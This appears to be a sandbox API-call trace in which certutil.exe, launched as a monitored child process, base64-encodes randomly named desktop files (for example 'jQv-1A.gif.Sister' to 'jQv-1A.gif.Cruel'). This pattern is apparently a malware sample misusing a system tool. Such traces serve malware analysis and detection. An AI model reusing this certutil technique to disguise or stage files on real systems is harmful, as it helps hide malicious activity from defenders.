0x0 [0227.329] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0227.329] GetACP () returned 0x4e4 [0227.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0227.329] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x23b078fbb00 [0227.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x23b078fbb00, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0227.329] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x23b078fe570 [0227.329] _vsnwprintf (in: _Buffer=0x23b078fe570, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf6b08ff4d8 | out: _Buffer="10.0.15063.447 retail867s") returned 21 [0227.329] LocalFree (hMem=0x23b078fbb00) returned 0x0 [0227.329] LocalFree (hMem=0x0) returned 0x0 [0227.329] GetACP () returned 0x4e4 [0227.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0227.329] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x23b078fbb00 [0227.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x23b078fbb00, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0227.330] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x23b078fe9f0 [0227.330] _vsnwprintf (in: _Buffer=0x23b078fe9f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf6b08ff508 | out: _Buffer="10.0.15063.447 retail") returned 21 [0227.330] LocalFree (hMem=0x23b078fbb00) returned 0x0 [0227.330] LocalFree (hMem=0x23b078fe4b0) returned 0x0 [0227.330] LocalFree (hMem=0x23b078fe570) returned 0x0 [0227.330] LocalFree (hMem=0x23b078fe9f0) returned 0x0 [0227.330] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0227.330] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0227.330] GetStockObject (i=0) returned 0x900010 [0227.330] RegisterClassW (lpWndClass=0xf6b08ff630) returned 0xc1a2 [0227.330] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x602c6 [0227.428] NtdllDefWindowProc_W () returned 0x0 [0227.429] NtdllDefWindowProc_W () returned 0x1 [0227.434] NtdllDefWindowProc_W () returned 0x0 [0227.441] UpdateWindow (hWnd=0x602c6) returned 1 [0227.441] PostMessageW (hWnd=0x602c6, Msg=0x400, wParam=0x0, lParam=0x23b078e217e) returned 1 [0227.441] GetMessageW (in: lpMsg=0xf6b08ff680, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf6b08ff680) returned 1 [0227.442] TranslateMessage (lpMsg=0xf6b08ff680) returned 0 [0227.442] DispatchMessageW (lpMsg=0xf6b08ff680) returned 0x0 [0227.442] NtdllDefWindowProc_W () returned 0x0 [0227.442] GetMessageW (in: lpMsg=0xf6b08ff680, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf6b08ff680) returned 1 [0227.442] TranslateMessage (lpMsg=0xf6b08ff680) returned 0 [0227.442] DispatchMessageW (lpMsg=0xf6b08ff680) returned 0x0 [0227.442] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x23b078e95a0 [0227.442] LocalAlloc (uFlags=0x0, uBytes=0x8a) returned 0x23b078eb280 [0227.442] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0227.442] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0227.442] SetLastError (dwErrCode=0x80070716) [0227.442] _vsnwprintf (in: _Buffer=0xf6b08ff088, _BufferCount=0xb, _Format="%d", _ArgList=0xf6b08ff078 | out: _Buffer="465") returned 3 [0227.442] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xf6b08fee40, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0227.442] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x23b078ebc60 [0227.443] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0227.443] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0227.443] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xf6b08fee20, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0227.443] GetLastError () returned 0xcb [0227.443] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0227.443] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0227.443] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0227.443] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0227.443] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0227.443] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0227.443] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0227.443] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0227.443] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0227.443] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0227.443] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0227.443] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0227.443] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0227.443] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0227.443] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0227.443] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0227.444] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0227.444] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0227.444] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0227.444] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0227.444] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0227.444] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xf6b08feae8 | out: phkResult=0xf6b08feae8*=0x23c) returned 0x0 [0227.444] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x23b078e9790 [0227.444] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xf6b08ff058, lpData=0xf6b08ff088, lpcbData=0xf6b08ff050*=0x4 | out: lpType=0xf6b08ff058*=0x0, lpData=0xf6b08ff088*=0x0, lpcbData=0xf6b08ff050*=0x4) returned 0x2 [0227.444] LocalFree (hMem=0x23b078e9790) returned 0x0 [0227.444] RegCloseKey (hKey=0x23c) returned 0x0 [0227.444] LocalFree (hMem=0x0) returned 0x0 [0227.444] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x23b0790d060 [0227.455] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0227.455] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0227.455] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0227.455] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0227.455] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0227.455] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0227.455] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0227.455] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0227.456] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0227.456] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x23b07911d70 [0227.456] GetComputerNameW (in: lpBuffer=0x23b07911d70, nSize=0xf6b08ff050 | out: lpBuffer="NQDPDE", nSize=0xf6b08ff050) returned 1 [0227.456] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xf6b08ff020 | out: lpBuffer=0x0, nSize=0xf6b08ff020) returned 0 [0227.457] GetLastError () returned 0xea [0227.457] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x23b078fbec0 [0227.457] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x23b078fbec0, nSize=0xf6b08ff020 | out: lpBuffer="NQdPdE", nSize=0xf6b08ff020) returned 1 [0227.457] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0227.497] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x23b079121a0, cbCertEncoded=0x15b63) returned 0x0 [0227.501] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x23b079121a0, cbCrlEncoded=0x15b63) returned 0x0 [0227.503] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x23b079121a0, cbEncoded=0x15b63, dwFlags=0x8000, pDecodePara=0xf6b08fef00, pvStructInfo=0xf6b08fef90, pcbStructInfo=0xf6b08fef84 | out: pvStructInfo=0xf6b08fef90, pcbStructInfo=0xf6b08fef84) returned 0 [0227.503] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x23b079121a0, cbEncoded=0x15b63, dwFlags=0x8000, pDecodePara=0xf6b08fef00, pvStructInfo=0xf6b08fef90, pcbStructInfo=0xf6b08fef84 | out: pvStructInfo=0xf6b08fef90, pcbStructInfo=0xf6b08fef84) returned 0 [0227.503] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x23b079121a0, cbEncoded=0x15b63, dwFlags=0x8000, pDecodePara=0xf6b08fef00, pvStructInfo=0xf6b08fef90, pcbStructInfo=0xf6b08fef84 | out: pvStructInfo=0xf6b08fef90, pcbStructInfo=0xf6b08fef84) returned 0 [0227.504] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x23b078f5a00 [0227.511] CryptMsgUpdate (hCryptMsg=0x23b078f5a00, pbData=0x23b079121a0, cbData=0x15b63, fFinal=1) returned 0 [0227.512] GetLastError () returned 0x8009310b [0227.512] CryptMsgClose (hCryptMsg=0x23b078f5a00) returned 1 [0227.512] GetFileAttributesExW (in: lpFileName="i6gjWm0aNWU1xM.swf.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\i6gjwm0anwu1xm.swf.sister"), fInfoLevelId=0x0, lpFileInformation=0xf6b08fefb0 | out: lpFileInformation=0xf6b08fefb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc2bba0, ftCreationTime.dwHighDateTime=0x1d5f00b, ftLastAccessTime.dwLowDateTime=0xf22a9ec0, ftLastAccessTime.dwHighDateTime=0x1d5ef71, ftLastWriteTime.dwLowDateTime=0xf22a9ec0, ftLastWriteTime.dwHighDateTime=0x1d5ef71, nFileSizeHigh=0x0, nFileSizeLow=0x15b63)) returned 1 [0227.512] _vsnwprintf (in: _Buffer=0xf6b08fefb8, _BufferCount=0xb, _Format="%d", _ArgList=0xf6b08fefa8 | out: _Buffer="359") returned 3 [0227.512] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xf6b08fed70, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0227.512] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x23b07911da0 [0227.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0227.512] _vsnwprintf (in: _Buffer=0xf6b08fdfa0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xf6b08feff8 | out: _Buffer="Input Length = 88931") returned 20 [0227.512] GetFileType (hFile=0x50) returned 0x2 [0227.512] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf6b08fdfa0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xf6b08fdf54, lpReserved=0x0 | out: lpBuffer=0xf6b08fdfa0*, lpNumberOfCharsWritten=0xf6b08fdf54*=0x14) returned 1 [0227.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0227.661] _vsnwprintf (in: _Buffer=0xf6b08fdfa0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf6b08feff8 | out: _Buffer="\n") returned 1 [0227.661] GetFileType (hFile=0x50) returned 0x2 [0227.661] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf6b08fdfa0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf6b08fdf54, lpReserved=0x0 | out: lpBuffer=0xf6b08fdfa0*, lpNumberOfCharsWritten=0xf6b08fdf54*=0x1) returned 1 [0227.770] GetFileAttributesExW (in: lpFileName="i6gjWm0aNWU1xM.swf.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\i6gjwm0anwu1xm.swf.cruel"), fInfoLevelId=0x0, lpFileInformation=0xf6b08fefb0 | out: lpFileInformation=0xf6b08fefb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb25d290a, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb25d290a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb25edc39, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1dde2)) returned 1 [0227.770] _vsnwprintf (in: _Buffer=0xf6b08fefb8, _BufferCount=0xb, _Format="%d", _ArgList=0xf6b08fefa8 | out: _Buffer="361") returned 3 [0227.770] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xf6b08fed70, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0227.770] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x23b07911e60 [0227.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0227.770] _vsnwprintf (in: _Buffer=0xf6b08fdfa0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xf6b08feff8 | out: _Buffer="Output Length = 122338") returned 22 [0227.771] GetFileType (hFile=0x50) returned 0x2 [0227.771] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf6b08fdfa0*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xf6b08fdf54, lpReserved=0x0 | out: lpBuffer=0xf6b08fdfa0*, lpNumberOfCharsWritten=0xf6b08fdf54*=0x16) returned 1 [0227.887] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0227.887] _vsnwprintf (in: _Buffer=0xf6b08fdfa0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf6b08feff8 | out: _Buffer="\n") returned 1 [0227.887] GetFileType (hFile=0x50) returned 0x2 [0227.887] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf6b08fdfa0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf6b08fdf54, lpReserved=0x0 | out: lpBuffer=0xf6b08fdfa0*, lpNumberOfCharsWritten=0xf6b08fdf54*=0x1) returned 1 [0227.965] LocalFree (hMem=0x23b079121a0) returned 0x0 [0227.965] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0227.965] _vsnwprintf (in: _Buffer=0xf6b08ff018, _BufferCount=0xb, _Format="%d", _ArgList=0xf6b08ff008 | out: _Buffer="2022") returned 4 [0227.965] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xf6b08fedd0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0227.965] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x23b078e8ce0 [0227.965] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0227.965] _vsnwprintf (in: _Buffer=0xf6b08fe000, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xf6b08ff058 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0227.965] GetFileType (hFile=0x50) returned 0x2 [0227.965] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf6b08fe000*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xf6b08fdfb4, lpReserved=0x0 | out: lpBuffer=0xf6b08fe000*, lpNumberOfCharsWritten=0xf6b08fdfb4*=0x31) returned 1 [0228.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0228.037] _vsnwprintf (in: _Buffer=0xf6b08fe000, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf6b08ff058 | out: _Buffer="\n") returned 1 [0228.038] GetFileType (hFile=0x50) returned 0x2 [0228.038] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf6b08fe000*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf6b08fdfb4, lpReserved=0x0 | out: lpBuffer=0xf6b08fe000*, lpNumberOfCharsWritten=0xf6b08fdfb4*=0x1) returned 1 [0228.135] LocalFree (hMem=0x0) returned 0x0 [0228.135] LocalFree (hMem=0x23b078eb280) returned 0x0 [0228.135] LocalFree (hMem=0x23b078e95a0) returned 0x0 [0228.135] SetLastError (dwErrCode=0x80070716) [0228.135] _vsnwprintf (in: _Buffer=0xf6b08ff088, _BufferCount=0xb, _Format="%d", _ArgList=0xf6b08ff078 | out: _Buffer="511") returned 3 [0228.135] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xf6b08fee40, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0228.135] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x23b07911c20 [0228.136] PostQuitMessage (nExitCode=0) [0228.139] GetMessageW (in: lpMsg=0xf6b08ff680, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf6b08ff680) returned 0 [0228.139] LocalFree (hMem=0x23b078fbec0) returned 0x0 [0228.139] LocalFree (hMem=0x23b07911d70) returned 0x0 [0228.139] LocalFree (hMem=0x0) returned 0x0 [0228.139] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0228.140] GetLastError () returned 0x7e [0228.140] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0228.140] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0228.140] DllMain () returned 0x1 [0228.140] LocalFree (hMem=0x23b078fbd60) returned 0x0 [0228.140] LocalFree (hMem=0x23b078ebc60) returned 0x0 [0228.140] LocalFree (hMem=0x23b07911da0) returned 0x0 [0228.140] LocalFree (hMem=0x23b07911e60) returned 0x0 [0228.140] LocalFree (hMem=0x23b078e8ce0) returned 0x0 [0228.140] LocalFree (hMem=0x23b07911c20) returned 0x0 [0228.140] LocalFree (hMem=0x23b078f2480) returned 0x0 [0228.140] LocalFree (hMem=0x23b078ec2f0) returned 0x0 [0228.141] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0228.141] GetLastError () returned 0x7e [0228.141] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0228.141] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0228.141] DllMain () returned 0x1 [0228.141] exit (_Code=0) Thread: id = 55 os_tid = 0xf0 Thread: id = 56 os_tid = 0x6e0 Process: id = "19" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x204b0000" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 57 os_tid = 0xf3c [0230.225] GetStartupInfoW (in: lpStartupInfo=0x51f36ff8c0 | out: lpStartupInfo=0x51f36ff8c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0230.229] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0230.300] __set_app_type (_Type=0x1) [0230.300] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0230.300] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0230.302] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0230.302] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0230.303] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0230.303] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0230.303] WerSetFlags () returned 0x0 [0230.303] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0230.303] __iob_func () returned 0x7ffcea2dea00 [0230.303] _fileno (_File=0x7ffcea2dea30) returned 1 [0230.304] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0230.304] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0230.304] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0230.305] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0230.305] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0230.305] GetConsoleOutputCP () returned 0x1b5 [0230.377] _vsnwprintf (in: _Buffer=0x51f36ff830, _BufferCount=0xb, _Format=".%d", _ArgList=0x51f36ff758 | out: _Buffer=".437") returned 4 [0230.377] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0230.377] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0230.377] GetFileType (hFile=0x50) returned 0x2 [0230.378] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0230.378] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0230.378] SetThreadUILanguage (LangId=0x0) returned 0x409 [0230.447] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0230.447] GetCommandLineW () returned="certutil -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\"" [0230.447] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x20c0269b840 [0230.448] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x20c0268c9d0 [0230.448] LocalFree (hMem=0x20c0269b840) returned 0x0 [0230.448] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x20c0268b8c0 [0230.448] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x20c0268bd10 [0230.448] LocalFree (hMem=0x20c0268b8c0) returned 0x0 [0230.448] LocalFree (hMem=0x20c0268c9d0) returned 0x0 [0230.448] LocalFree (hMem=0x0) returned 0x0 [0230.448] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0230.448] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0230.449] GetCommandLineW () returned="certutil -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\"" [0230.449] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x20c0269bb20 [0230.449] GetSystemTime (in: lpSystemTime=0x51f36ff520 | out: lpSystemTime=0x51f36ff520*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x4, wMilliseconds=0x3dd)) [0230.449] SystemTimeToFileTime (in: lpSystemTime=0x51f36ff520, lpFileTime=0x51f36ff518 | out: lpFileTime=0x51f36ff518) returned 1 [0230.449] FileTimeToLocalFileTime (in: lpFileTime=0x51f36ff518, lpLocalFileTime=0x51f36ff4e0 | out: lpLocalFileTime=0x51f36ff4e0) returned 1 [0230.449] FileTimeToSystemTime (in: lpFileTime=0x51f36ff4e0, lpSystemTime=0x51f36ff250 | out: lpSystemTime=0x51f36ff250) returned 1 [0230.449] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x51f36ff250, lpFormat=0x0, lpDateStr=0x51f36ff360, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0230.449] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x51f36ff250, lpFormat=0x0, lpTimeStr=0x51f36ff260, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0230.449] _vsnwprintf (in: _Buffer=0x51f36ff26e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x51f36ff238 | out: _Buffer=" 04.989s") returned 8 [0230.450] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x20c0269e750 [0230.450] SetLastError (dwErrCode=0x80070716) [0230.450] _vsnwprintf (in: _Buffer=0x51f36ff2e8, _BufferCount=0xb, _Format="%d", _ArgList=0x51f36ff2d8 | out: _Buffer="948") returned 3 [0230.450] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x51f36ff0a0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0230.450] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 